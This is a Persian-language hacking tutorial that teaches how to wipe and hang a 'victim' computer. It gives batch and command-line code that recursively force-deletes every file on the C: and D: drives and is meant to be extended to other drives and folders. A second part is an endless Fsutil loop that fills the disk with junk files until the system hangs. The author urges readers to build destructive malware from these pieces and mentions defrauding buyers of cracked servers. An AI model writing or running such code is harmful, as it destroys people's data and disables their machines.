از بین بردن اطلاعات سیستم قربانی

با سلام خدمت همگی دوستان 

توی این آموزش قراره راجب از بین بردن اطلاعات سیستم قربانی و به هنگ انداختن سیستم قربانی صحبت کنیم

ویروسای مخرب همیشه از تکه کدهای ساده و کاربردی ایجاد میشن

برای همین ما هم قراره توی این پست تکه کد ساده و کاربردی معرفی کنیم که میتونه اطلاعات یه سیستم رو از بین ببره و یکسری فایل آت و آشغال رو با فایلای اصلی و شاید مهم سیستم قربانی جایگزین کنه

صد البته به جای اینکار ما میتونیم با دستور فرمت خیلی سریعتر و راحت تر اینکار رو انجام بدیم

اما بعضی وقتا سطح دسترسی اجازه اینکار رو نمیده که ما هم خیلی راحت میتونیم با یه تکه کد ساده از یه روش دیگه پیروی کنیم

یا اصن برنامه های کاربردی و مخرب دیگه بسازیم و اهداف خودمون رو پیاده سازی کنیم

For /R D:\ %i in (*) do echo %i && Ping "LocalHost"  > nul -n 2 && CLS

کد بالا رو که توی خط فرمان وارد کنید متوجه میشید که میاد و اسم تک تک فایلاتون رو دو ثانیه یکبار دونه به دونه نشون میده

حالا ما میتونیم به جای دستور Echo از دستور Del استفاده کنیم تا به جای نمایش فایل ها اون فایل از بین بره

For /R D:\ %i in (*) do del /F /S /Q %i && Ping "LocalHost"  > nul -n 2 && CLS

که البته چون ما از دستور Ping استفاده کردیم و دستور دادیم که هر دو ثانیه یکبار یه فایل پاک بشه اینکار زیاد جالب نمیشه و ممکنه پروسه ی برناممون یه خرده طولانی بشه که بهتره این شکلی بنویسیم :

For /R D:\ %i in (*) do del /F /S /Q %i CLS

حتما دقت کنید از کدهای بالا داخل خط فرمان استفاده کنید و سریعا بعد از اجرا خط فرمان رو ببندین یا کلید های ترکیبی Ctrl + C رو فشار بدین تا کد وارد شده به روند اجرا و تخریب خودش ادامه نده

و اینکه دقت کنین اگه قراره داخل یه Batch فایل قرار بدین و از راه دور به سیستم قربانی دسترسی ندارین باید به جای i% حتما از i%% استفاده کنین

همونطور که گفتم هدفم یه اشاره ی ریز بود و حالا شما هستین که باید از تکه های بالا یه برنامه مخرب بسازین و به جای تخریب فایل های درایو D دستور تخریب فایل درایوای دیگه رو هم بدین

For /R C:\ %%i in (*) do del /F /S /Q %%i CLS
For /R D:\ %%i in (*) do del /F /S /Q %%i CLS

Va.

کدهای بالا هم برای یه فایل Batch هستش که باید به جای .Va اسم درایوهای دیگه رو هم اضافه کنین

ضمنا به این مورد اشاره کنم که میتونین علاوه بر لیست و حذف کردن فایل ها

داخل کد به جای ستاره ( * ) از نقطه ( . ) استفاده کنین و اسم فولدرها یا همون پوشه های سیستم قربانی رو بدست بیارین و بعدش با دستور RmDir اونهارو از بین ببرید که من طرز نوشتنش رو گفتم و نوشتنش با خودتونه که یه خرده تنبل به بار نیاین :)

حالا میرسیم به نحوه ی پر کردن هارد سیستم قربانی از اطلاعات چرت و پرت

برای اینکار ما از دستور Fsutil استفاده میکنیم که خوشبختانه این دستور روی سیستم عامل های قدیمی هم موجوده و موجب میشه که ویروس ما روی همه ی سیستم عامل های ویندوزی اجرا بشه

یه بچ فایل ایجاد کنین و کدهای پایین رو داخلش قرار بدین

Cd %UserProfile%\Desktop
:Start
Fsutil file createnew %random%.bak %random%
Fsutil file createnew %random%.mp3 %random%
Fsutil file createnew %random%.mp4 %random%
Goto Start

وقتی که کدهارو قرار دادین با کلید های Ctrl + C اونارو داخل فایل ذخیره کنید و اونو اجرا کنین و سریع ببندید

بعد از اجرا و بستن یه نیم نگاه به صفحه ی دسکتاپتون بندازین تا بهتر متوجه بشین که این کدها دقیقا قراره چیکار کنن

در واقع این کدها میان یه فایل با اسم تصادفی و پسوند های bak و mp3 و mp4 فایل های چرت و پرت ایجاد میکنن که موجب میشه هارد سیستم قربانی از اطلاعات مزخرف پر بشه و اگه سیستم قربانی کم بیاره میتونه موجب هنگی سیستم طرفمون هم بشه.

همچنین میتونیم به جای استفاده از %random% از یه سایز بیشتر هم برای فایلی که قراره ایجاد بشه استفاده کنیم

Fsutil file createnew %random%.bak 999999999

مثلا کد بالا یه فایل معادل حجم یک گیگابایت ایجاد میکنه

اما این کدها کاربردای دیگه هم داره

به عنوان مثال اینروزا آدمایی هستن که سرور مجازی کرک میکنین و سرور های هارد دار رو میفروشن که با این روش میتونین فایل فیک روی سرور ایجاد کنن و سرورارو به خریدار اینجور سرور ها بفروشن.

در کل کدی که قرار دادم رو یه خرده دستکاری کنین و سعی کنین اهدافتون رو خودتون پیاده سازی کنید

dedsec will give you the truth

join us